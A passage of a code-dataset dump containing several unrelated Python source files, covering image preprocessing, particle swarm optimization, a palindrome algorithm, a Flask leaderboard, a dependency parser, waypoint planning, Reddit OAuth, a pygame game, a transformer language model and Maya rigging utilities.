'signature_sketch.jpg'\n\nSIGNATURE_CROP = [0,0,210,460] #Temporary values\nMEDIANBLUR_KERNEL_SIZE = 3\nNORMALIZED_X, NORMALIZED_Y = 200, 100\n\n#Load Image\n\nimg = cv2.imread(IMAGE_FILE, 0)\nprint(\"Size: \", img.shape)\nimg = img[SIGNATURE_CROP[0]:SIGNATURE_CROP[2], SIGNATURE_CROP[1]:SIGNATURE_CROP[3]]\nscale_x = SIGNATURE_CROP[3] - SIGNATURE_CROP[1]\nscale_y = SIGNATURE_CROP[2] - SIGNATURE_CROP[0]\n\n#Filtering:\n\n#Noise Reduction\nmedian_blurred_img = cv2.medianBlur(img, MEDIANBLUR_KERNEL_SIZE)\n\n#Background Elimination\nret, bg_eliminated_img = cv2.threshold(median_blurred_img, 127, 255, cv2.THRESH_BINARY)\n\n#Bounding Box\nimg_contours, hierarchy = cv2.findContours(bg_eliminated_img,cv2.RETR_LIST,cv2.CHAIN_APPROX_SIMPLE)\n\nx2=0\ny2=0\nx1 = scale_x\ny1 = scale_y\nprint(scale_x, scale_y, \"DEBUG\")\nfor cnt_temp in img_contours[:-1]:\n\tx,y,w,h = cv2.boundingRect(cnt_temp)\n\tx1 = min(x1, x)\n\ty1 = min(y1, y)\n\tx2 = max(x2, x+w)\n\ty2 = max(y2, y+h)\n\t#cv2.rectangle(bg_eliminated_img,(x,y),(x+w,y+h),(0,255,0))\n\nprint(x1, y1, x2, y2)\ncv2.rectangle(bg_eliminated_img,(x1,y1),(x2,y2),(0,255,0))\n\n#Scale Normalization\nscale_normalized_img = cv2.resize(bg_eliminated_img[y1:y2, x1:x2], (NORMALIZED_X,NORMALIZED_Y))\n\n#Display\ncv2.imshow('image',img)\ncv2.imshow('im2', scale_normalized_img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"616825800","text":"import numpy as np\nfrom sys import argv\nfrom phonecal import io\nfrom phonecal.raw import pull_apart\nfrom phonecal.general import Rsquare\nfrom phonecal.gain import malus, malus_error\n\nfolder = io.path_from_input(argv)\nroot, images, stacks, products, results = io.folders(folder)\nphone = io.read_json(root/\"info.json\")\n\nangles, means = io.load_means (folder, retrieve_value=io.split_pol_angle)\nprint(\"Read DNG\")\ncolours = io.load_colour(stacks)\n\noffset_angle = np.loadtxt(stacks/\"linearity\"/\"default_angle.dat\")\nprint(\"Read angles\")\nintensities = malus(angles, 
offset_angle)\nintensities_errors = malus_error(angles, offset_angle, sigma_angle0=1, sigma_angle1=1)\n\nmeans = np.moveaxis(means , 0, 2)\nprint(\"Reshaped arrays\")\n\nmeans_RGBG, _ = pull_apart(means , colours)\nprint(\"Reshaped to RGBG\")\n\nmax_value = 2**phone[\"camera\"][\"bits\"]\nsaturation = 0.95 * max_value\n\ndef linear_R2(x, y, saturate=4000):\n ind = np.where(y < saturate)\n p = np.polyfit(x[ind], y[ind], 1)\n pv = np.polyval(p, x[ind])\n R2 = Rsquare(y[ind], pv)\n return R2\n\nprint(\"Doing R^2 comparison...\", end=\" \")\n\nM_reshaped = means_RGBG.reshape(4, -1, means_RGBG.shape[-1])\n#M_reshaped = np.ma.array(M_reshaped, mask=M_reshaped>4000)\nR2 = np.zeros((4, len(M_reshaped[0])))\nfor j, M in enumerate(M_reshaped):\n R2[j] = [linear_R2(intensities, row, saturate=saturation) for row in M]\n print(j, end=\" \")\n\nnp.save(products/\"linearity_R2.npy\", R2)\n","sub_path":"linearity_calculate_R2.py","file_name":"linearity_calculate_R2.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"81478389","text":"import numpy as np\r\nimport random\r\nimport resltestfunction\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport time\r\n\r\n\r\nclass CLPSO:\r\n def __init__(self, pn, dim, iter_max, xmax, xmin, F_n):\r\n self.F_n = F_n\r\n self.pn = pn\r\n self.dim = dim\r\n self.iter_max = iter_max\r\n self.w0 = 0.9\r\n self.w1 = 0.4\r\n self.c1 = 1.49445\r\n self.c2 = 1.49445\r\n self.m = 7\r\n self.vmax = 100\r\n self.vmin = -100\r\n self.xmax = xmax\r\n self.xmin = xmin\r\n self.x = np.zeros((self.pn, self.dim))\r\n self.v = np.zeros((self.pn, self.dim))\r\n # best position experienced by each particle and the global best position\r\n self.pbest = np.zeros((self.pn, self.dim))\r\n self.gbest = np.zeros((1, self.dim))\r\n self.pc = np.zeros(self.pn)\r\n self.flag = np.zeros(self.pn)\r\n self.f = np.zeros((self.pn, self.dim))\r\n # historical best fitness of each particle\r\n self.p_fit = np.zeros(self.pn) # each particle keeps its own historical best fitness\r\n # global best fitness\r\n self.fit = 1e10\r\n\r\n # @staticmethod\r\n # def F_n(x):\r\n # return np.sum(x**2)\r\n\r\n def init_population(self):\r\n self.x = self.xmin + (self.xmax - self.xmin) * np.random.rand(self.pn, self.dim)\r\n self.v = self.vmin + 2 * self.vmax * np.random.rand(self.pn, self.dim)\r\n self.pbest = self.x.copy()\r\n self.p_fit = np.array([self.F_n(self.x[i]) for i in range(self.x.shape[0])])\r\n self.fit = np.min(self.p_fit)\r\n self.gbest = self.x[np.argmin(self.p_fit)].copy()\r\n ind = np.array([i - 1 for i in range(self.pn)])\r\n self.pc = 0.05 + 0.45 * (np.exp((10 * ind / (self.pn - 1)) - 1) / (np.exp(10) - 1))\r\n\r\n def iterator(self):\r\n fitness = []\r\n for k in range(self.iter_max):\r\n w = self.w0 - ((self.w0 - self.w1) * k / self.iter_max)\r\n for i in range(self.pn):\r\n temp = self.F_n(self.x[i])\r\n if temp >= self.p_fit[i]:\r\n self.flag[i] += 1\r\n if temp < self.p_fit[i]:\r\n self.p_fit[i] = temp\r\n self.pbest[i] = self.x[i].copy()\r\n self.flag[i] = 0\r\n if self.p_fit[i] < self.fit:\r\n self.gbest = self.x[i].copy()\r\n self.fit = self.p_fit[i].copy()\r\n for i in range(self.pn):\r\n if self.flag[i] >= self.m:\r\n for j in range(self.dim):\r\n if random.random() < self.pc[i]:\r\n f1 = int(np.floor(random.random() * self.pn))\r\n f2 = int(np.floor(random.random() * self.pn))\r\n if self.F_n(self.pbest[f1]) < self.F_n(self.pbest[f2]):\r\n self.f[i][j] = f1\r\n else:\r\n self.f[i][j] = f2\r\n else:\r\n self.f[i][j] = i\r\n self.flag[i] = 0\r\n else:\r\n tt = random.randint(0, 32767)\r\n for j in 
range(self.dim):\r\n if j == tt % self.dim:\r\n self.f[i][j] = tt % self.pn\r\n else:\r\n self.f[i][j] = i\r\n for i in range(self.pn):\r\n for j in range(self.dim):\r\n self.v[i][j] = w * self.v[i][j] + self.c1 * random.random() * (self.pbest[int(self.f[i][j])][j] - self.x[i][j])\r\n self.v[i][j] = np.clip(self.v[i][j], self.vmin, self.vmax)\r\n self.x[i][j] = np.clip(self.x[i][j] + self.v[i][j], self.xmin, self.xmax)\r\n\r\n fitness.append(self.fit)\r\n return fitness\r\n\r\n\r\n\r\nf_list1 = [resltestfunction.f1, resltestfunction.f2, resltestfunction.f3, resltestfunction.f4, resltestfunction.f5] # unimodal & multimodal functions\r\n\r\nfitness_bound = {f_list1[0]: (-100, 100), f_list1[1]: (-100, 100), f_list1[2]: (-100, 100), f_list1[3]: (-15, 10), f_list1[4]: (-10, 10)}\r\n\r\ndims=[100]\r\niter = 30\r\nMaxiter = 500\r\nall_f = [f_list1]\r\nprint(\"begin my iteration\")\r\nexcel = pd.ExcelWriter('newtest-CLPSO-it500-d100.xlsx')\r\nfor ex_index, fn in enumerate(all_f):\r\n function_name = [\"f\" + str(i + 1) for i in range(len(fn))]\r\n df = pd.DataFrame(columns=['mean', 'std', 'min'], index=function_name)\r\n for index, f in enumerate(fn):\r\n result = []\r\n print(\"%d_%d processing\" % (ex_index, index))\r\n for i in range(iter):\r\n [lower, upper] = fitness_bound[f]\r\n\r\n my_pso =CLPSO(pn=60, dim=dims[ex_index], iter_max=Maxiter, xmax=upper, xmin=lower, F_n=f)\r\n my_pso.init_population()\r\n fitness = my_pso.iterator()\r\n # print(np.min(fitness), np.mean(fitness), np.std(fitness))\r\n # print(\"---------------------------------------\")\r\n result.append(np.min(fitness))\r\n if i == iter - 1:\r\n df.loc[function_name[index], 'mean'] = np.mean(result)\r\n df.loc[function_name[index], 'std'] = np.std(result)\r\n df.loc[function_name[index], 'min'] = np.min(result)\r\n # result[index, :] = [np.min(fitness), np.mean(fitness), np.std(fitness)]\r\n df.to_excel(excel, sheet_name=str(ex_index + 1))\r\n excel.save()\r\n","sub_path":"CS/程序/粒子群/CAPSO-6-CLPSO/new-6-CLPSO.py","file_name":"new-6-CLPSO.py","file_ext":"py","file_size_in_byte":5392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"547565471","text":"class Solution(object):\n def countSubstrings(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n # returns an array whose entry at position i is the radius of the longest palindrome centered at i\n p = self.manacher(s)\n print(p)\n count_num = 0\n for p_num in p:\n count_num += p_num // 2\n return count_num\n\n def manacher(self, s):\n s_new = ''\n for word in s:\n s_new += '#' + word\n s_new = '$' + s_new + '#' + '&'\n print(s_new)\n len_s_new = len(s_new)\n p = [0 for _ in range(len_s_new)]\n # max_substring_len, max_substring_pos = -1, -1\n idx, mx = 0, 0\n for i in range(1, len_s_new - 1):\n if (i < mx):\n p[i] = min(p[2 * idx - i], mx - i)\n else:\n p[i] = 1\n\n # while((i + p[i] < len_s_new)and (s_new[i - p[i]] == s_new[i +\n # p[i]])):if p_num > 1\n while(s_new[i - p[i]] == s_new[i + p[i]]):\n p[i] += 1\n\n if i + p[i] > mx:\n mx = i + p[i]\n idx = i\n\n # if p[i] - 1 > max_substring_len:\n # max_substring_len = p[i] - 1\n # max_substring_pos = i\n\n # print(max_substring_pos, max_substring_len)\n # istart = (max_substring_pos - max_substring_len - 1) // 2\n\n return p\n\n\nif __name__ == '__main__':\n s = \"abc\"\n print(s)\n sub = Solution().countSubstrings(s)\n print(sub)\n","sub_path":"LeetCode/647.palindromicsubstrings.py","file_name":"647.palindromicsubstrings.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"83732627","text":"import csv\n\nfrom flask import Flask\nfrom flask import render_template\n\nfrom google.cloud import datastore\nfrom google.oauth2 import service_account\n\n\ncredentials = service_account.Credentials \\\n .from_service_account_file('./bigdatatech-warsaw-challenge-219525419ec7.json')\nclient = datastore.Client(project=credentials.project_id, credentials=credentials)\napp = Flask(__name__,\n static_url_path='/static'\n)\n\n@app.route(\"/\")\ndef data_store():\n query = client.query(kind=\"race_results\")\n query.order = ['time']\n\n results = query.fetch(limit=200)\n results = deduplicate_results(results)\n return render_template('index.html', results=results[:10])\n\n\n@app.route(\"/csv\")\ndef csv_store():\n results = list()\n with open('results.csv', newline='') as csvfile:\n reader = csv.reader(csvfile, delimiter=',')\n\n for row in reader:\n results.append({\n 'username' : row[0],\n 'time' : int(row[1])\n })\n\n results.sort(key=lambda result: result['time'],reverse=False)\n results = deduplicate_results(results)\n return render_template('index.html', results=results[:10])\n\n\ndef deduplicate_results(results):\n deduplication_info = set()\n deduplicated_results = list()\n\n for result in results:\n if result['username'] not in deduplication_info:\n deduplicated_results.append(result)\n deduplication_info.add(result['username'])\n\n return deduplicated_results\n\n\nif __name__ == \"__main__\":\n app.run()\n\n\n","sub_path":"webapp/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"605428252","text":"def arc_hybrid_train(sentence):\n\n bu = [] # buffer\n st = [] # stack\n ar = [] # arcset\n\n X = []\n Y = []\n index_number = [] # [[-1, -1, 2, 3], [1, 2, 4, 6], ... 
]\n\n for eojul in sentence:\n bu.append(eojul)\n X.append(eojul.wordvec)\n\n sequence_length = len(bu)\n config_num = 0\n while not (len(bu) == 1 and len(st) == 0):\n if len(st) == 0:\n index_number.append([-1, -1, -1, bu[0].pos - 1])\n st.append(bu[0])\n bu.pop(0)\n Y.append([1, 0]) # SHIFT\n elif len(st) == 1:\n index_number.append([-1, -1, st[-1].pos - 1, bu[0].pos - 1])\n if st[-1].head_pos == bu[0].pos: # LEFT\n Y.append([0, 1]) # LEFT-ARC\n st.pop(-1)\n else: # SHIFT\n Y.append([1, 0])\n st.append(bu[0])\n bu.pop(0)\n elif len(st) == 2:\n index_number.append([-1, st[-2].pos - 1, st[-1].pos - 1, bu[0].pos - 1])\n if st[-1].head_pos == bu[0].pos:\n Y.append([0, 1]) # LEFT-ARC\n st.pop(-1)\n else:\n Y.append([1, 0])\n st.append(bu[0])\n bu.pop(0)\n else:\n index_number.append([st[-3].pos - 1, st[-2].pos - 1, st[-1].pos - 1, bu[0].pos - 1])\n if st[-1].head_pos == bu[0].pos:\n Y.append([0, 1]) # LEFT-ARC\n st.pop(-1)\n else:\n Y.append([1, 0])\n st.append(bu[0])\n bu.pop(0)\n config_num += 1\n # print(\"=============================================\")\n # print(\"{} : {}\".format(config_num, st))\n # print(\"{} : {}\".format(config_num, bu))\n # print(\"{} : index_number length: {}\".format(config_num, len(index_number)))\n # print(\"{} : {}\".format(config_num, Y))\n # print(\"{} : {}\".format(config_num, sequence_length))\n # print(\"=============================================\")\n # print(\"\\n\\n\")\n\n assert len(X) == sequence_length\n assert len(index_number) == config_num == len(Y)\n\n return X, Y, index_number, config_num\n\n\n# def archybrid_test(sentence):\n# pass\n","sub_path":"sen_parser.py","file_name":"sen_parser.py","file_ext":"py","file_size_in_byte":2246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"629097617","text":"from collections import deque\nfrom copy import deepcopy\n\nfrom distance import find_waypoint_distance\n\n\ndef get_waypoint_speed(waypoint):\n return waypoint.twist.twist.linear.x\n\n\ndef set_waypoint_speed(waypoint, speed):\n waypoint.twist.twist.linear.x = speed\n\n\nclass Plan(object):\n def __init__(self, base_waypoints, start_index, num_waypoints, trajectory):\n self.base_waypoints = base_waypoints\n self.start_index = start_index\n self.num_waypoints = num_waypoints\n self.trajectory = trajectory\n\n self.final_speed = float('inf')\n self.waypoints = deque()\n self.end_index = start_index\n self.end_distance = 0.0\n self.__fill()\n self.__spur_on_if_needed()\n\n def advance(self, waypoint_index):\n delta = waypoint_index - self.start_index\n self.start_index += delta\n\n while delta > 0 and len(self.waypoints) > 0:\n delta -= 1\n self.waypoints.popleft()\n self.__fill()\n\n def get_speeds(self):\n return [get_waypoint_speed(waypoint) for waypoint in self.waypoints]\n\n def __fill(self):\n while not self.__done() and not self.__full():\n waypoint = deepcopy(self.base_waypoints[self.end_index])\n self.end_index += 1\n\n if len(self.waypoints) > 0:\n self.end_distance += find_waypoint_distance(\n self.waypoints[-1], waypoint)\n\n if self.trajectory is not None:\n time = self.trajectory.find_time_to_position(self.end_distance)\n if time is None:\n self.final_speed = self.trajectory.speed(\n self.trajectory.horizon)\n self.trajectory = None\n else:\n speed = self.trajectory.speed(time)\n\n if self.trajectory is None:\n speed = self.final_speed\n\n if speed < get_waypoint_speed(waypoint):\n set_waypoint_speed(waypoint, speed)\n self.waypoints.append(waypoint)\n\n def __done(self):\n return 
self.end_index >= len(self.base_waypoints)\n\n def __full(self):\n return len(self.waypoints) >= self.num_waypoints\n\n def __spur_on_if_needed(self):\n \"\"\"\n The car often needs some encouragement to get started.\n \"\"\"\n if len(self.waypoints) < 2:\n return\n next_speed = (get_waypoint_speed(self.waypoints[0]) +\n get_waypoint_speed(self.waypoints[1])) / 2.0\n set_waypoint_speed(self.waypoints[0], next_speed)\n","sub_path":"ros/src/waypoint_updater/plan.py","file_name":"plan.py","file_ext":"py","file_size_in_byte":2576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"446526221","text":"import sys\r\nimport pygame\r\nfrom player import *\r\nfrom setting import *\r\n\r\npygame.init()\r\nvec = pygame.math.Vector2\r\nclass App :\r\n def __init__(self):\r\n self.screen = pygame.display.set_mode((WIDTH, HEIGHT))\r\n self.clock = pygame.time.Clock()\r\n self.running = True\r\n self.state = 'intro'\r\n self.score = 0\r\n self.cell_h = MAZE_HEIGHT //COLS\r\n self.cell_w = MAZE_WIDTH //ROWS\r\n self.player = Player(self,PLAYER_START_POSITION)\r\n self.load()\r\n def run(self):\r\n while self.running :\r\n if self.state == 'intro':\r\n self.start_event()\r\n self.start_update()\r\n self.start_draw()\r\n elif self.state == 'playing':\r\n self.playing_event()\r\n self.playing_update()\r\n self.playing_draw()\r\n else:\r\n self.running = False\r\n self.clock.tick(FPS)\r\n pygame.quit()\r\n sys.exit()\r\n##################### HELP FUNCTION ################################33\r\n def draw_text(self, word,screen,pos, size, color, font_name, center = False):\r\n font = pygame.font.SysFont(font_name, size)\r\n text = font.render(word, False, color)\r\n text_size = text.get_size()\r\n if center:\r\n pos[0] = pos[0] - text_size[0] //2\r\n pos[1] = pos[1] - text_size[1] //2\r\n screen.blit(text,pos)\r\n \r\n def load(self):\r\n self.icon = pygame.image.load(START_ICON)\r\n background = pygame.image.load('maze.png')\r\n self.background = pygame.transform.scale(background,(MAZE_WIDTH, MAZE_HEIGHT))\r\n\r\n def darw_grid(self):\r\n for x in range(WIDTH//self.cell_w):\r\n pygame.draw.line(self.background, GREY , (x*self.cell_w, 0),(x*self.cell_w, HEIGHT))\r\n for y in range(HEIGHT//self.cell_h):\r\n pygame.draw.line(self.background, GREY , (0, y * self.cell_h),(WIDTH, y*self.cell_h))\r\n##################### START FUNCTION ################################33\r\n\r\n def start_event(self):\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n self.running = False\r\n if event.type == pygame.KEYDOWN and event.key == pygame.K_SPACE:\r\n self.state = 'playing'\r\n print(\"Space press\")\r\n\r\n def start_update(self):\r\n pass\r\n def start_draw(self):\r\n self.screen.fill (BLACK)\r\n icon = pygame.transform.scale(self.icon, (100,100))\r\n self.screen.blit(icon,[WIDTH//2 -50, HEIGHT//2 -150])\r\n\r\n self.draw_text(\"PUSH SPACE BAR\",self.screen, [WIDTH//2, HEIGHT//2], START_TEXT_SIZE, (170,132,58) , START_FONT, center = True)\r\n self.draw_text(\"1 Player Only\",self.screen, [WIDTH//2, HEIGHT//2 + 50], START_TEXT_SIZE, (25, 73, 215) , START_FONT, center = True)\r\n self.draw_text(\"HIGHEST SCORE: {}\".format(self.score),self.screen, [4, 0], START_TEXT_SIZE, (255,255,255) , START_FONT)\r\n pygame.display.update()\r\n\r\n##################### Playing FUNCTION ################################33\r\n def playing_event(self):\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n self.running = False\r\n \r\n\r\n def 
playing_update(self):\r\n pass\r\n def playing_draw(self):\r\n self.screen.fill(BLACK)\r\n self.screen.blit (self.background,(TOP_BOTTOM_BUFFER//2, TOP_BOTTOM_BUFFER//2))\r\n self.darw_grid()\r\n self.draw_text(\"CURRENT SCORE: {}\".format(0),self.screen, [50, 5], 18, WHITE , START_FONT)\r\n self.draw_text(\"HIGH SCORE: {}\".format(0),self.screen, [WIDTH//2, 5], 18, WHITE , START_FONT)\r\n pygame.display.update()","sub_path":"app_class.py","file_name":"app_class.py","file_ext":"py","file_size_in_byte":3722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"103035955","text":"# -*- coding: utf-8 -*-\n\"\"\"\n-------------------------------------------------\n File Name: language_model\n Description :\n Author : chenhao\n date: 2019-11-13\n-------------------------------------------------\n Change Activity:\n 2019-11-13:\n-------------------------------------------------\n\"\"\"\nfrom eigen_nltk.core import Context, ModelEstimator\nfrom eigen_nltk.trans import DataParser, remove_token_char\nfrom eigen_nltk.model_utils import get_lm_decoder_model\nfrom eigen_nltk.utils import padding_seq, list_find\nfrom eigen_nltk.optimizer import get_optimizer_cls\nfrom keras.losses import sparse_categorical_crossentropy\nfrom keras.layers import *\n\n\nclass LMContext(Context):\n def __init__(self, vocab_path):\n super().__init__(vocab_path)\n\n\nclass TransformerLM(ModelEstimator):\n\n def __init__(self, name, context, logger_level=\"INFO\"):\n assert isinstance(context, LMContext)\n self.context = context\n self.vocab_size = self.context.vocab_size\n data_parser = DataParser(context)\n super().__init__(name, data_parser, logger_level)\n\n def _build_model(self, embedding_dim, decoder_block_num, head_num, hidden_dim, embed_trainable=True, **kwargs):\n model = get_lm_decoder_model(vocab_size=self.vocab_size, embedding_dim=embedding_dim,\n decoder_num=decoder_block_num, head_num=head_num,\n hidden_dim=hidden_dim, embed_trainable=embed_trainable)\n\n return model\n\n def _compile_model(self, optimizer_name, optimizer_args, **kwargs):\n opt_cls = get_optimizer_cls(optimizer_name)\n optimizer = opt_cls(**optimizer_args)\n self.training_model.compile(optimizer, loss=sparse_categorical_crossentropy)\n return self.training_model\n\n def _get_predict_data_from_model_output(self, origin_data, enhanced_data, pred_data, show_detail=False):\n hard_pred = pred_data.argmax(axis=2).tolist()\n text_pred = [self._id_list2text(id_list) for id_list in hard_pred]\n return text_pred\n\n def _get_enhanced_data(self, data):\n enhance_data = []\n for idx, line in enumerate(data):\n tmp_item = dict(content=line)\n bert_input = self.data_parser.get_bert_input(line)\n input_token = bert_input['token'][:-1]\n output_token = bert_input[\"token\"][1:]\n x = bert_input['x'][:-1]\n y = bert_input['x'][1:]\n tmp_item.update(input_token=input_token, output_token=output_token, x=x, y=y)\n enhance_data.append(tmp_item)\n self.logger.info(\"get {0} enhanced data from {1} origin data\".format(len(enhance_data), len(data)))\n return enhance_data\n\n def _get_model_train_input(self, train_data, _max_len=128, **kwargs):\n x = []\n y = []\n max_len = max(len(e['x']) for e in train_data)\n max_len = min(max_len, _max_len)\n for item in train_data:\n x.append(padding_seq(item['x'], max_len))\n if 'y' in item.keys():\n y.append(padding_seq(item['y'], max_len))\n\n x = np.array(x)\n if y:\n y = np.array(y)[:, :, np.newaxis]\n return x, y\n\n def _id_list2text(self, id_list):\n token_list = 
self._id_list2token_list(id_list)\n text = \"\".join([remove_token_char(t) for t in token_list])\n return text\n\n def _id_list2token_list(self, id_list):\n token_list = [self.context.id2token[i] for i in id_list]\n return token_list\n\n def predict_next_token(self, data, batch_size=64, verbose=1):\n raw_pred = self._get_raw_predict(data, batch_size=batch_size, verbose=verbose)\n idx_pred = raw_pred.argmax(axis=2)[:, -1]\n token_pred = [self.context.id2token[i] for i in idx_pred]\n return token_pred\n\n def generate_sequence(self, data, max_len, batch_size=64, verbose=1, end_token='[SEP]'):\n enhance_data = self._get_enhanced_data(data)\n x = self._get_model_test_input(enhance_data)\n cur_len = x.shape[1]\n for i in range(max_len - cur_len):\n # print(x.shape)\n raw_pred = self.model.predict(x, batch_size=batch_size, verbose=verbose)\n last_pred = raw_pred.argmax(axis=2)[:, -1][:, np.newaxis]\n # print(last_pred.shape)\n x = np.concatenate([x, last_pred], axis=1)\n token_list = [self._id_list2token_list(id_list) for id_list in x]\n text_list = []\n print(token_list)\n for tokens in token_list:\n end_idx = list_find(tokens, end_token)\n tokens = tokens[1:] if end_idx == -1 else tokens[1:end_idx]\n text = \"\".join([remove_token_char(t) for t in tokens])\n text_list.append(text)\n\n return text_list\n","sub_path":"eigen_nltk/language_model.py","file_name":"language_model.py","file_ext":"py","file_size_in_byte":4803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"161904738","text":"from flask_restful import Resource\nfrom flask_restful.reqparse import Argument\n\nfrom services import RedditService\nfrom utils import parse_params, IdentityManager\n\n\nclass RedditOAuth(Resource):\n \"\"\"\n Reddit OAuth process handler resource\n\n Detailed archived documentation can be found at https://github.com/reddit-archive/reddit/wiki/oauth2\n\n A Session object must be created to sustain the process with proper set user agent\n\n :param Resource: Inherit from base flask-restful resource class\n :type Resource: Resource\n :return: Reddit OAuth process resource class\n :rtype: Resource\n \"\"\"\n\n @staticmethod\n @parse_params(\n Argument(\"code\", location=\"args\", required=True),\n Argument(\"callback_url\", location=\"args\", required=True),\n )\n @IdentityManager.set_cookie(RedditService)\n def post(code, callback_url):\n \"\"\"\n POST endpoint for retrieving the access token given after acquiring authorization code\n\n :param code: A one-time use code that may be exchanged for a bearer token\n :type code: str\n :param callback_url: Callback URL from application domain\n :type callback_url: str\n :return: JSON data of access_token on event of success authorization\n :rtype: BaseResponse\n \"\"\"\n response = RedditService.exchange_token(code, callback_url)\n return response.data, response.status_code\n","sub_path":"server/api/resources/oauth/reddit.py","file_name":"reddit.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"27738283","text":"import pymel.core as pm\nimport random \n\ndef rig_transformer_pieces( *args, **kwargs):\n\t'''\n\tUsage:\n\t\trig_transformer_pieces()\n\t'''\n\ttop_grp = pm.PyNode( 'model_GRP' )\n\tfor transform in select_polys_under_top_node( top_grp ):\n\t\trig_transformer_piece( transform )\n\ndef rig_transformer_piece( transform ):\n\t'''\n\tUsage:\n\t\trig_transformer_piece( pm.ls(sl=True)[0] )\n\t'''\n\tif 
get_parentConstraintPairs( transform):\n\t\t#create a control and store its groups/parts\n\t\tctrl_GRP = create_boundingBoxCtrl( transform )\n\t\tctrl = [ctrl for ctrl in ctrl_GRP.listRelatives( c=True, type='transform' ) if 'CTRL' in ctrl.name()][0]\n\t\tctrlCon_GRP = [con_grp for con_grp in ctrl.listRelatives( c=True, type='transform' ) if 'Con_GRP' in con_grp.name()][0]\n\t\t#get the parent constraint information and then remove it\n\t\ttarget_weight_pairs = get_parentConstraintPairs( transform )\n\t\tpm.delete( target_weight_pairs[1] )\n\t\t#setup the new space switching based on the old parent constraint\n\t\tparents = [target_weight_pairs[0][0][0], 'spineJA_JNT', 'spineJF_JNT', 'globalB_CTRL', 'worldSpace_GRP']\n\t\tparent_names = ['normal', 'hips', 'chest', 'global', 'world']\t\n\t\tctrl_setupSpaceSwitch( ctrl, ctrl_GRP, parents, parent_names )\n\t\t#control the object with the new space-switch controller\n\t\tpm.parentConstraint( ctrlCon_GRP, transform, mo=True )\n\t\tpm.scaleConstraint( ctrlCon_GRP, transform, mo=True )\n\telse:\n\t\t#if it didn't have a parentConstraint do nothing\n\t\treturn None\n\ndef ctrl_setupSpaceSwitch( driver, driven, parents, parent_names, attr_name='space' ):\n\t'''\n\tArgs:\n\t\tdriver (pm.nt.Transform): object to hold space switch attribute\n\t\tdriven (pm.nt.Transform): object to be constrained\n\t\tparents (list of pm.PyNode): parents to switch between\n\t\tparent_names (list of string): names of parents, must be same length as parents\n\t\tattr_name (string): name of attribute to control the asset, defaults as space\n\tReturns (pm.nt.ParentConstraint): space switching constraint created\n\t'''\n\t#first add the enum attr\n\tdriver.addAttr( attr_name, at='enum', en=':'.join(parent_names), k=True )\t\n\tconstraint = pm.parentConstraint( parents, driven, mo=True )\n\t#now create the on off condition nodes from the attr to the parent constraint\n\tweight_alias_list = constraint.getWeightAliasList()\n\t\n\tindex = 0\n\tfor parent, alias_attr in zip( parents, weight_alias_list ):\n\t\tcondition = pm.createNode( 'condition' )\n\t\tcondition.operation.set( 1 )\n\t\tdriver.attr(attr_name).connect( condition.firstTerm )\n\t\tcondition.secondTerm.set( index )\n\t\tcondition.outColorR.connect( alias_attr )\n\t\tindex += 1\n\treturn constraint\n\t\t\ndef get_parentConstraintPairs( transform ):\n\t'''\n\tUsage:\n\t\tget_parentConstraintPairs( pm.ls(sl=True)[0] )\n\t'''\n\tif transform.listConnections(type='parentConstraint'):\n\t\tparentConstraint = list( set( transform.listConnections(type='parentConstraint') ) )[0]\n\t\ttargets = parentConstraint.getTargetList()\n\t\tweight_attrs = parentConstraint.getWeightAliasList()\n\t\ttarget_weight_pairs = []\n\t\tfor target, weight_attr in zip( targets, weight_attrs ):\n\t\t\ttarget_weight_pairs.append( [target, weight_attr] )\n\t\treturn [ target_weight_pairs, parentConstraint ]\n\telse:\n\t\treturn None\n\ndef create_boundingBoxCtrl( transform ):\n\t'''\n\tUsage:\n\t\tcreate_boundingBoxCtrl( pm.ls(sl=True)[0] )\n\t'''\n\tbase_name = transform.name().replace('_GEO','') + 'Own'\n\n\tbbox = pm.exactWorldBoundingBox( transform, ii=True, ce=True )\n\tcenterX = (bbox[0] + bbox[3]) / 2.0\n\tcenterY = (bbox[1] + bbox[4]) / 2.0\n\tcenterZ = (bbox[2] + bbox[5]) / 2.0\n\tcenter_point = ( centerX, centerY, centerZ )\n\t\n\tp0=(bbox[0], bbox[1], bbox[2])\n\tp1=(bbox[0], bbox[1], bbox[5])\n\tp2=(bbox[0], bbox[4], bbox[2])\n\tp3=(bbox[0], bbox[4], bbox[5])\n\tp4=(bbox[3], bbox[4], bbox[2])\n\tp5=(bbox[3], bbox[4], 
